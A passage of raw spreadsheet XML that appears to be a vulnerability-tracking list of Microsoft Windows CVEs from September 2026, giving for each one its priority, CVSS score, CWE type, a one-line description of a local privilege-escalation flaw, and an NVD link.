r="Q924" s="5" t="inlineStr" /><c r="R924" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S924" s="5" t="inlineStr"><is><t>Use after free in Audio Video Control Transport Protocol allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T924" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69401</t></is></c></row><row r="925"><c r="A925" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B925" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C925" s="5" t="inlineStr"><is><t>CVE-2026-69404</t></is></c><c r="D925" s="5" t="n"><v>7</v></c><c r="E925" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F925" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G925" s="5" t="inlineStr" /><c r="H925" s="5" t="n"><v>0.002</v></c><c r="I925" s="5" t="inlineStr" /><c r="J925" s="5" t="inlineStr" /><c r="K925" s="5" t="inlineStr" /><c r="L925" s="5" t="inlineStr" /><c r="M925" s="5" t="inlineStr" /><c r="N925" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O925" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P925" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q925" s="5" t="inlineStr" /><c r="R925" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S925" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T925" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69404</t></is></c></row><row r="926"><c r="A926" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B926" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C926" s="5" t="inlineStr"><is><t>CVE-2026-69410</t></is></c><c r="D926" s="5" t="n"><v>7</v></c><c r="E926" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F926" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G926" s="5" t="inlineStr" /><c r="H926" s="5" t="n"><v>0.003</v></c><c r="I926" s="5" t="inlineStr" /><c r="J926" s="5" t="inlineStr" /><c r="K926" s="5" t="inlineStr" /><c r="L926" s="5" t="inlineStr" /><c r="M926" s="5" t="inlineStr" /><c r="N926" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O926" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P926" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q926" s="5" t="inlineStr" /><c r="R926" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S926" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T926" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69410</t></is></c></row><row r="927"><c r="A927" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B927" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C927" s="5" t="inlineStr"><is><t>CVE-2026-69413</t></is></c><c r="D927" s="5" t="n"><v>7</v></c><c r="E927" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F927" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G927" s="5" t="inlineStr" /><c r="H927" s="5" t="n"><v>0.003</v></c><c r="I927" s="5" t="inlineStr" /><c r="J927" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K92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27" s="5" t="inlineStr" /><c r="M927" s="5" t="inlineStr" /><c r="N927" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O927" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P927" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q927" s="5" t="inlineStr" /><c r="R927" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S927" s="5" t="inlineStr"><is><t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T927" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t></is></c></row><row r="928"><c r="A928" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B928" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C928" s="5" t="inlineStr"><is><t>CVE-2026-69422</t></is></c><c r="D928" s="5" t="n"><v>7</v></c><c r="E928" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F928" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G928" s="5" t="inlineStr" /><c r="H928" s="5" t="n"><v>0.003</v></c><c r="I928" s="5" t="inlineStr" /><c r="J928" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K928" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L928" s="5" t="inlineStr" /><c r="M928" s="5" t="inlineStr" /><c r="N928" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O928" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P928" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q928" s="5" t="inlineStr" /><c r="R928" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S928" s="5" t="inlineStr"><is><t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T928" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t></is></c></row><row r="929"><c r="A929" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B929" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C929" s="5" t="inlineStr"><is><t>CVE-2026-69430</t></is></c><c r="D929" s="5" t="n"><v>7</v></c><c r="E929" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F929" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G929" s="5" t="inlineStr" /><c r="H929" s="5" t="n"><v>0.003</v></c><c r="I929" s="5" t="inlineStr" /><c r="J929" s="5" t="inlineStr" /><c r="K929" s="5" t="inlineStr" /><c r="L929" s="5" t="inlineStr" /><c r="M929" s="5" t="inlineStr" /><c r="N929" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O929" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P929" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q929" s="5" t="inlineStr" /><c r="R929" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S929" s="5" t="inlineStr"><is><t>Use after free in Windows Embedded Mode Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T929" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69430</t></is></c></row><row r="930"><c r="A930" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B930" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C930" s="5" t="inlineStr"><is><t>CVE-2026-69440</t></is></c><c r="D930" s="5" t="n"><v>7</v></c><c r="E930" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F930" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G930" s="5" t="inlineStr" /><c r="H930" s="5" t="n"><v>0.002</v></c><c r="I930" s="5" t="inlineStr" /><c r="J930" s="5" t="inlineStr" /><c r="K930" s="5" t="inlineStr" /><c r="L930" s="5" t="inlineStr" /><c r="M930" s="5" t="inlineStr" /><c r="N930" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O930" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P930" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q930" s="5" t="inlineStr" /><c r="R930" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S930" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T930" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69440</t></is></c></row><row r="931"><c r="A931" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B931" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C931" s="5" t="inlineStr"><is><t>CVE-2026-69441</t></is></c><c r="D931" s="5" t="n"><v>7</v></c><c r="E931" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F931" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G931" s="5" t="inlineStr" /><c r="H931" s="5" t="n"><v>0.002</v></c><c r="I931" s="5" t="inlineStr" /><c r="J931" s="5" t="inlineStr" /><c r="K931" s="5" t="inlineStr" /><c r="L931" s="5" t="inlineStr" /><c r="M931" s="5" t="inlineStr" /><c r="N931" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O931" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P931" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q931" s="5" t="inlineStr" /><c r="R931" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S931" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T931" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69441</t></is></c></row><row r="932"><c r="A932" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B932" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C932" s="5" t="inlineStr"><is><t>CVE-2026-69448</t></is></c><c r="D932" s="5" t="n"><v>7</v></c><c r="E932" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F932" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G932" s="5" t="inlineStr" /><c r="H932" s="5" t="n"><v>0.002</v></c><c r="I932" s="5" t="inlineStr" /><c r="J932" s="5" t="inlineStr" /><c r="K932" s="5" t="inlineStr" /><c r="L932" s="5" t="inlineStr" /><c r="M932" s="5" t="inlineStr" /><c r="N932" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O932" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P932" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q932" s="5" t="inlineStr" /><c r="R932" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S932" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T932" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69448</t></is></c></row><row r="933"><c r="A933" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B933" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C933" s="5" t="inlineStr"><is><t>CVE-2026-69466</t></is></c><c r="D933" s="5" t="n"><v>7</v></c><c r="E933" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F933" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G933" s="5" t="inlineStr" /><c r="H933" s="5" t="n"><v>0.002</v></c><c r="I933" s="5" t="inlineStr" /><c r="J933" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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33" s="5" t="inlineStr" /><c r="M933" s="5" t="inlineStr" /><c r="N933" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O933" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P933" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q933" s="5" t="inlineStr" /><c r="R933" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S933" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T933" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t></is></c></row><row r="934"><c r="A934" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B934" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C934" s="5" t="inlineStr"><is><t>CVE-2026-69468</t></is></c><c r="D934" s="5" t="n"><v>7</v></c><c r="E934" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F934" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G934" s="5" t="inlineStr" /><c r="H934" s="5" t="n"><v>0.003</v></c><c r="I934" s="5" t="inlineStr" /><c r="J934" s="5" t="inlineStr" /><c r="K934" s="5" t="inlineStr" /><c r="L934" s="5" t="inlineStr" /><c r="M934" s="5" t="inlineStr" /><c r="N934" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O934" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P934" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q934" s="5" t="inlineStr" /><c r="R934" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S934" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T934" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69468</t></is></c></row><row r="935"><c r="A935" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B935" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C935" s="5" t="inlineStr"><is><t>CVE-2026-69470</t></is></c><c r="D935" s="5" t="n"><v>7</v></c><c r="E935" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F935" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G935" s="5" t="inlineStr" /><c r="H935" s="5" t="n"><v>0.003</v></c><c r="I935" s="5" t="inlineStr" /><c r="J935" s="5" t="inlineStr" /><c r="K935" s="5" t="inlineStr" /><c r="L935" s="5" t="inlineStr" /><c r="M935" s="5" t="inlineStr" /><c r="N935" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O935" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P935" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q935" s="5" t="inlineStr" /><c r="R935" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S935" s="5" t="inlineStr"><is><t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T935" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69470</t></is></c></row><row r="936"><c r="A936" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B936" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C936" s="5" t="inlineStr"><is><t>CVE-2026-69472</t></is></c><c r="D936" s="5" t="n"><v>7</v></c><c r="E936" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F936" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G936" s="5" t="inlineStr" /><c r="H936" s="5" t="n"><v>0.003</v></c><c r="I936" s="5" t="inlineStr" /><c r="J936" s="5" t="inlineStr" /><c r="K936" s="5" t="inlineStr" /><c r="L936" s="5" t="inlineStr" /><c r="M936" s="5" t="inlineStr" /><c r="N936" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O936" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P936" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q936" s="5" t="inlineStr" /><c r="R936" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S936" s="5" t="inlineStr"><is><t>Use after free in Windows Devices Human Interface allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T936" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69472</t></is></c></row><row r="937"><c r="A937" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B937" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C937" s="5" t="inlineStr"><is><t>CVE-2026-69473</t></is></c><c r="D937" s="5" t="n"><v>7</v></c><c r="E937" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F937" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G937" s="5" t="inlineStr" /><c r="H937" s="5" t="n"><v>0.003</v></c><c r="I937" s="5" t="inlineStr" /><c r="J937" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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37" s="5" t="inlineStr" /><c r="M937" s="5" t="inlineStr" /><c r="N937" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O937" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P937" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q937" s="5" t="inlineStr" /><c r="R937" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S937" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T937" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t></is></c></row><row r="938"><c r="A938" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B938" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C938" s="5" t="inlineStr"><is><t>CVE-2026-69488</t></is></c><c r="D938" s="5" t="n"><v>7</v></c><c r="E938" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F938" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G938" s="5" t="inlineStr" /><c r="H938" s="5" t="n"><v>0.003</v></c><c r="I938" s="5" t="inlineStr" /><c r="J938" s="5" t="inlineStr" /><c r="K938" s="5" t="inlineStr" /><c r="L938" s="5" t="inlineStr" /><c r="M938" s="5" t="inlineStr" /><c r="N938" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O938" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P938" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q938" s="5" t="inlineStr" /><c r="R938" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S938" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T938" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69488</t></is></c></row><row r="939"><c r="A939" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B939" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C939" s="5" t="inlineStr"><is><t>CVE-2026-69492</t></is></c><c r="D939" s="5" t="n"><v>7</v></c><c r="E939" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F939" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G939" s="5" t="inlineStr" /><c r="H939" s="5" t="n"><v>0.003</v></c><c r="I939" s="5" t="inlineStr" /><c r="J939" s="5" t="inlineStr" /><c r="K939" s="5" t="inlineStr" /><c r="L939" s="5" t="inlineStr" /><c r="M939" s="5" t="inlineStr" /><c r="N939" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O939" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P939" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q939" s="5" t="inlineStr" /><c r="R939" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S939" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T939" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69492</t></is></c></row><row r="940"><c r="A940" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B940" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C940" s="5" t="inlineStr"><is><t>CVE-2026-69498</t></is></c><c r="D940" s="5" t="n"><v>7</v></c><c r="E940" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F940" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G940" s="5" t="inlineStr" /><c r="H940" s="5" t="n"><v>0.003</v></c><c r="I940" s="5" t="inlineStr" /><c r="J940" s="5" t="inlineStr" /><c r="K940" s="5" t="inlineStr" /><c r="L940" s="5" t="inlineStr" /><c r="M940" s="5" t="inlineStr" /><c r="N940" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O940" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P940" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q940" s="5" t="inlineStr" /><c r="R940" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S940" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T940" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69498</t></is></c></row><row r="941"><c r="A941" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B941" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C941" s="5" t="inlineStr"><is><t>CVE-2026-69500</t></is></c><c r="D941" s="5" t="n"><v>7</v></c><c r="E941" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F941" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G941" s="5" t="inlineStr" /><c r="H941" s="5" t="n"><v>0.003</v></c><c r="I941" s="5" t="inlineStr" /><c r="J941" s="5" t="inlineStr" /><c r="K941" s="5" t="inlineStr" /><c r="L941" s="5" t="inlineStr" /><c r="M941" s="5" t="inlineStr" /><c r="N941" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O941" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P941" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q941" s="5" t="inlineStr" /><c r="R941" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S941" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T941" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69500</t></is></c></row><row r="942"><c r="A942" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B942" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C942" s="5" t="inlineStr"><is><t>CVE-2026-69501</t></is></c><c r="D942" s="5" t="n"><v>7</v></c><c r="E942" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F942" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G942" s="5" t="inlineStr" /><c r="H942" s="5" t="n"><v>0.002</v></c><c r="I942" s="5" t="inlineStr" /><c r="J942" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K942" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L942" s="5" t="inlineStr" /><c r="M942" s="5" t="inlineStr" /><c r="N942" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O942" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P942" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q942" s="5" t="inlineStr" /><c r="R942" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S942" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T942" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t></is></c></row><row r="943"><c r="A943" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B943" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C943" s="5" t="inlineStr"><is><t>CVE-2026-69516</t></is></c><c r="D943" s="5" t="n"><v>7</v></c><c r="E943" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F943" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G943" s="5" t="inlineStr" /><c r="H943" s="5" t="n"><v>0.002</v></c><c r="I943" s="5" t="inlineStr" /><c r="J943" s="5" t="inlineStr" /><c r="K943" s="5" t="inlineStr" /><c r="L943" s="5" t="inlineStr" /><c r="M943" s="5" t="inlineStr" /><c r="N943" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O943" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P943" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q943" s="5" t="inlineStr" /><c r="R943" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S943" s="5" t="inlineStr"><is><t>Use after free in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T943" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69516</t></is></c></row><row r="944"><c r="A944" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B944" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C944" s="5" t="inlineStr"><is><t>CVE-2026-69517</t></is></c><c r="D944" s="5" t="n"><v>7</v></c><c r="E944" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F944" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G944" s="5" t="inlineStr" /><c r="H944" s="5" t="n"><v>0.003</v></c><c r="I944" s="5" t="inlineStr" /><c r="J944" s="5" t="inlineStr" /><c r="K944" s="5" t="inlineStr" /><c r="L944" s="5" t="inlineStr" /><c r="M944" s="5" t="inlineStr" /><c r="N944" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O944" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P944" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q944" s="5" t="inlineStr" /><c r="R944" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S944" s="5" t="inlineStr"><is><t>Use after free in Windows Wireless Networking allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T944" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69517</t></is></c></row><row r="945"><c r="A945" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B945" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C945" s="5" t="inlineStr"><is><t>CVE-2026-69540</t></is></c><c r="D945" s="5" t="n"><v>7</v></c><c r="E945" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F945" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G945" s="5" t="inlineStr" /><c r="H945" s="5" t="n"><v>0.003</v></c><c r="I945" s="5" t="inlineStr" /><c r="J945" s="5" t="inlineStr" /><c r="K945" s="5" t="inlineStr" /><c r="L945" s="5" t="inlineStr" /><c r="M945" s="5" t="inlineStr" /><c r="N945" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O945" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P945" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q945" s="5" t="inlineStr" /><c r="R945" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S945" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T945" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69540</t></is></c></row><row r="946"><c r="A946" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B946" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C946" s="5" t="inlineStr"><is><t>CVE-2026-69549</t></is></c><c r="D946" s="5" t="n"><v>7</v></c><c r="E946" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F946" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G946" s="5" t="inlineStr" /><c r="H946" s="5" t="n"><v>0.003</v></c><c r="I946" s="5" t="inlineStr" /><c r="J946" s="5" t="inlineStr" /><c r="K946" s="5" t="inlineStr" /><c r="L946" s="5" t="inlineStr" /><c r="M946" s="5" t="inlineStr" /><c r="N946" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O946" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P946" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q946" s="5" t="inlineStr" /><c r="R946" s="5" t="inlineStr"><is><t>CWE-125, CWE-200</t></is></c><c r="S946" s="5" t="inlineStr"><is><t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T946" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69549</t></is></c></row><row r="947"><c r="A947" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B947" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C947" s="5" t="inlineStr"><is><t>CVE-2026-69560</t></is></c><c r="D947" s="5" t="n"><v>7</v></c><c r="E947" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F947" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G947" s="5" t="inlineStr" /><c r="H947" s="5" t="n"><v>0.003</v></c><c r="I947" s="5" t="inlineStr" /><c r="J947" s="5" t="inlineStr" /><c r="K947" s="5" t="inlineStr" /><c r="L947" s="5" t="inlineStr" /><c r="M947" s="5" t="inlineStr" /><c r="N947" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O947" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P947" s="5" 